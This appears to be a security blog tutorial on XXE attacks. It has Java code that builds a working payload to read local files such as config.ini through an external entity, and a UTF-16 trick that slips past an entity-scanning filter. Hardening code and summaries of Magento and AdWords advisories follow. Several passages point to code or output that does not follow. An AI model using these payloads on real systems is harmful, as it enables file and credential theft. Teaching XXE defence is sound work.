How to hack #4 – XML External Entity Processing

Introduction

Today, we choose XML over JSON because of old, legacy applications that can only communicate using XML (for example SOAP), or because XML Schema is much more mature than JSON Schema or Swagger. Or you simply like XML or… you use Java! Whatever the reason, using this standard may be dangerous, and today I want to show you one of the attacks against it, called XML External Entity Processing (XXE).

Simple example

Let’s say we allow users to upload an XML file similar to the one below:

Our script which handles the XML file is:
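A handler like this can be sketched in Java as follows. It is a hypothetical equivalent: the class name `NaiveProductImporter` and the `<product>`/`<name>` layout are assumptions. The important detail is that it uses the JDK's `DocumentBuilderFactory` with its default settings:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

public class NaiveProductImporter {

    // Parses the uploaded XML with the JDK's default parser settings and
    // returns the text of the first <name> element. Nothing here restricts
    // DTDs or external entities, which is what makes it dangerous.
    public static String importProductName(String xml) {
        Document doc;
        try {
            doc = DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalArgumentException("Cannot parse product XML", e);
        }
        NodeList names = doc.getElementsByTagName("name");
        if (names.getLength() == 0) {
            throw new IllegalArgumentException("No <name> element in upload");
        }
        return names.item(0).getTextContent();
    }

    public static void main(String[] args) {
        String upload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
                + "<product><name>Coffee mug</name><price>9.99</price></product>";
        System.out.println("Imported product: " + importProductName(upload));
    }
}
```

Called on a benign upload it simply returns the product name; the attack described in this post relies on exactly these default settings.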

Very simple, isn’t it? We just take the input, parse it and display the product’s name. What could go wrong? Let’s take a step back and look at XML entities. There are 3 types of XML entity declarations: internal (parsed), external (parsed) and external (unparsed). We will be interested in the external parsed ones: their content is loaded from a URI and inserted into the document wherever the entity is referenced.

The basic syntax of entities is shown below:
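A minimal Java sketch of the simplest form, an internal entity, is below. The entity name `company`, its value and the product layout are made up for illustration; the comment lists the declaration forms of all three entity types:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

public class EntityBasics {

    // Declaration forms (inside the DOCTYPE's internal subset):
    //   internal:          <!ENTITY name "replacement text">
    //   external parsed:   <!ENTITY name SYSTEM "uri">
    //   external unparsed: <!ENTITY name SYSTEM "uri" NDATA notation>
    // Only the internal form is used here: "company" acts like a variable.
    public static final String XML = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
            + "<!DOCTYPE product ["
            + "<!ENTITY company \"ACME Corp\">"
            + "]>"
            + "<product><name>Mug by &company;</name></product>";

    // Parses the XML and returns the root element's text; the JDK parser
    // expands entity references by default.
    public static String rootText(String xml) {
        try {
            return DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)))
                    .getDocumentElement()
                    .getTextContent();
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalArgumentException("Cannot parse XML", e);
        }
    }

    public static void main(String[] args) {
        System.out.println(rootText(XML)); // Mug by ACME Corp
    }
}
```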

Simplifying, entities are like variables. We can put static text in them or load their value from some other source. What can that source be? Any file accessible over the internet, or a file on the local filesystem. Can you see where I am going? 🙂

We have an application that handles the XML we provide and displays the name of the product that was just imported. Let’s try to read its configuration, stored in a file called config.ini. To load any file on the filesystem that the script can access, we can use the syntax below:

Thanks to the SYSTEM keyword you can read any file. First, let’s try to load the configuration file. The ready-made XML is below:
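The same attack can be sketched in Java against a default-configured parser. Everything named here is an assumption for illustration: the class `XxeFileRead`, the entity name `xxe`, and the contents of a throwaway config.ini written to a temporary file:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

public class XxeFileRead {

    // Builds a product upload whose <name> is an external entity pointing
    // at a local file through its file:// URI.
    public static String payloadFor(Path file) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
                + "<!DOCTYPE product ["
                + "<!ENTITY xxe SYSTEM \"" + file.toUri() + "\">"
                + "]>"
                + "<product><name>&xxe;</name></product>";
    }

    // Naive handler with the default factory: the parser reads the file and
    // inlines its content where &xxe; appears. The file must itself be
    // well-formed text (no bare '<' or '&'), otherwise parsing fails.
    public static String importedName(String xml) {
        try {
            return DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)))
                    .getElementsByTagName("name").item(0).getTextContent();
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalArgumentException("Cannot parse product XML", e);
        }
    }

    // Writes a temporary "config.ini" with the given content, runs the
    // attack against it and returns whatever leaked into the product name.
    public static String demoLeak(String configContent) {
        try {
            Path config = Files.createTempFile("config", ".ini");
            try {
                Files.writeString(config, configContent, StandardCharsets.UTF_8);
                return importedName(payloadFor(config));
            } finally {
                Files.deleteIfExists(config);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("Imported product: " + demoLeak("db_user=shop db_password=s3cret"));
    }
}
```

`demoLeak` returns the file's contents as the "product name", which is exactly what an attacker would see echoed back by the import page.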

In my case, the script returns the following output:

Cool, isn’t it?! And that’s not all, because we can read ANY file the web server has access to.

If the PHP “expect” extension is installed, you can even achieve RCE (Remote Code Execution), which opens up many more attack vectors and can give you full control over the application.

Moreover, the same vulnerability can be reproduced in other languages, such as Java:
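In Java, reproducing the bug takes nothing more than `DocumentBuilderFactory.newInstance()` with its default settings, because the JDK parser resolves external entities out of the box. Closing the hole takes a few explicit switches. A minimal sketch follows, using the settings recommended in the OWASP XXE Prevention Cheat Sheet; the class and method names are hypothetical:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

public class HardenedProductImporter {

    // Refuses any DOCTYPE outright and, as a second line of defence,
    // never resolves external entities or external DTDs.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Same contract as a naive importer, but a DOCTYPE makes parsing fail.
    public static String importProductName(String xml) {
        Document doc;
        try {
            doc = hardenedFactory()
                    .newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalArgumentException("Rejected or unreadable product XML", e);
        }
        NodeList names = doc.getElementsByTagName("name");
        if (names.getLength() == 0) {
            throw new IllegalArgumentException("No <name> element in upload");
        }
        return names.item(0).getTextContent();
    }
}
```

Rejecting the DOCTYPE is the simplest and strongest option; the remaining settings matter only if an application genuinely needs DTDs and has to drop that first feature.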

So no one can sleep peacefully today…

Some real vulnerabilities

That was the theory, and it may be a bit boring… Let me show you some real examples.

Magento

Do you know Magento? Magento is one of the most popular e-commerce platforms written in PHP, with thousands of downloads. Magento uses Zend Framework (ZF) as its main library, which provides lots of useful libraries and classes. Unfortunately, a vulnerability was found in the ZF/Xml component which affected Magento CE <= 1.9.2.1 and Magento EE <= 1.14.2.1. The vulnerable code was in ZendFramework-1.12.13/library/Zend/Xml/Security.php and ZendFramework-2.4.2/library/ZendXml/Security.php. The whole exploit can be found below:

The author of the CVE-2015-5161 advisory wrote:

As we can see from the code, the application disables the entity loader
(via libxml_disable_entity_loader), it also disables network access
(LIBXML_NONET), and it additionally scans provided XML for the presence of XML
entities to prevent potential entity expansion attacks.
The code successfully prevents most XXE attacks.

However, as the PHP libxml_disable_entity_loader() function was reported not thread safe (the entity loader setting could potentially get overwritten between hits in FPM processes), Zend Framework does not use it when the application is hosted in a PHP-FPM environment. Instead, another approach is taken to prevent the XXE attacks.
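The weakness of any string-based pre-scan is that XML does not have to arrive as ASCII. The Java sketch below uses a hypothetical `looksMalicious` filter (not Zend's actual code) that searches the raw bytes for `<!ENTITY`. The same document encoded as UTF-16 slips past it, while the parser decodes it and expands the entity anyway. An internal entity keeps the demo offline; a real attack would use a SYSTEM entity:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

public class EntityScanBypass {

    // Hypothetical pre-parse filter: reads the raw bytes as single-byte
    // text and refuses the upload if "<!ENTITY" appears anywhere.
    public static boolean looksMalicious(byte[] upload) {
        return new String(upload, StandardCharsets.ISO_8859_1).contains("<!ENTITY");
    }

    // Document declared as UTF-16 and carrying an entity declaration.
    public static final String PAYLOAD = "<?xml version=\"1.0\" encoding=\"UTF-16\"?>"
            + "<!DOCTYPE p [<!ENTITY hidden \"entity was expanded\">]>"
            + "<p>&hidden;</p>";

    // Java's UTF-16 encoder writes a big-endian byte-order mark, and every
    // ASCII character becomes 0x00 followed by the character, so the bytes
    // of "<!ENTITY" never occur contiguously.
    public static byte[] utf16Upload() {
        return PAYLOAD.getBytes(StandardCharsets.UTF_16);
    }

    // The parser detects the byte-order mark, decodes UTF-16 and expands
    // the entity as usual.
    public static String parsedText(byte[] upload) {
        try {
            return DocumentBuilderFactory.newInstance()
                    .newDocumentBuilder()
                    .parse(new ByteArrayInputStream(upload))
                    .getDocumentElement()
                    .getTextContent();
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalArgumentException("Cannot parse XML", e);
        }
    }

    public static void main(String[] args) {
        byte[] asUtf8 = PAYLOAD.getBytes(StandardCharsets.UTF_8);
        byte[] asUtf16 = utf16Upload();
        System.out.println("filter flags UTF-8 bytes:  " + looksMalicious(asUtf8));
        System.out.println("filter flags UTF-16 bytes: " + looksMalicious(asUtf16));
        System.out.println("parser sees: " + parsedText(asUtf16));
    }
}
```

A filter that runs before parsing therefore has to decode the document exactly as the parser will; disabling DTD processing in the parser itself avoids the problem altogether.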

It is worth stressing that every library and application using the affected ZF component was vulnerable.

Google AdWords API

Another problem was found in the Google AdWords API. What is it? “The AdWords API allows apps to interact directly with the AdWords platform, vastly increasing the efficiency of managing large or complex AdWords accounts and campaigns”.

For security reasons, Google AdWords API can only be accessed via HTTPS.
However, the above code does not set appropriate SSL settings on the https:// stream context. It fails to assign Certificate Authority (CA),
and turn the verify_peer option to ON.
It uses the stream_context_get_default() to get the default context,
which on all PHP versions below PHP 5.6.x (see references below) does not
validate the CA by default.

Because of this, applications using the AdWords API library may be tricked into retrieving data from untrusted sources pretending to be adwords.google.com.
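The fix the advisory points to, verifying the peer against a trusted CA, has a direct Java counterpart. Java's `HttpsURLConnection` already checks both the certificate chain and the host name by default, but a raw `SSLSocket` only checks the chain unless endpoint identification is switched on. A minimal sketch follows; `VerifiedTls` and its methods are hypothetical names, and a call would look like `connect("adwords.google.com", 443)`:

```java
import java.io.IOException;
import java.security.GeneralSecurityException;
import java.security.KeyStore;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLParameters;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.TrustManagerFactory;

public class VerifiedTls {

    // TLS context whose trust decisions come from the JDK's default trust
    // store (a null KeyStore makes the factory load it, normally cacerts).
    public static SSLContext verifyingContext() {
        try {
            TrustManagerFactory tmf =
                    TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
            tmf.init((KeyStore) null);
            SSLContext ctx = SSLContext.getInstance("TLS");
            ctx.init(null, tmf.getTrustManagers(), null);
            return ctx;
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException("Cannot initialise TLS", e);
        }
    }

    // Additionally require the certificate to match the host name we
    // connected to; raw SSLSocket/SSLEngine instances skip this by default.
    public static SSLParameters requireHostnameCheck(SSLParameters params) {
        params.setEndpointIdentificationAlgorithm("HTTPS");
        return params;
    }

    // The handshake fails on an untrusted CA or a host name mismatch,
    // which is what stops a man-in-the-middle from posing as the server.
    public static SSLSocket connect(String host, int port) throws IOException {
        SSLSocket socket = (SSLSocket) verifyingContext().getSocketFactory().createSocket(host, port);
        try {
            socket.setSSLParameters(requireHostnameCheck(socket.getSSLParameters()));
            socket.startHandshake();
            return socket;
        } catch (IOException e) {
            socket.close();
            throw e;
        }
    }
}
```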

The vulnerability was found in the code below:

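To exploit this, an attacker has to combine it with another attack called Man-in-the-Middle (MITM): by impersonating adwords.google.com, the attacker can make the library process XML of their choosing.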

Summary

XML is still very popular; JSON and YAML have not pushed it out. However, as always, we need to be careful with it, because an attack can come from almost any direction. Do you know any other ways to attack XML formats or parsers? Share them in the comments!

About author

Hi! I am Bartek. I'm a PHP developer, but other languages don't scare me. My hobby is security, and I try to learn as much as possible about how not to get hacked. I like to know how things work. After hours I like playing Dota 2 :)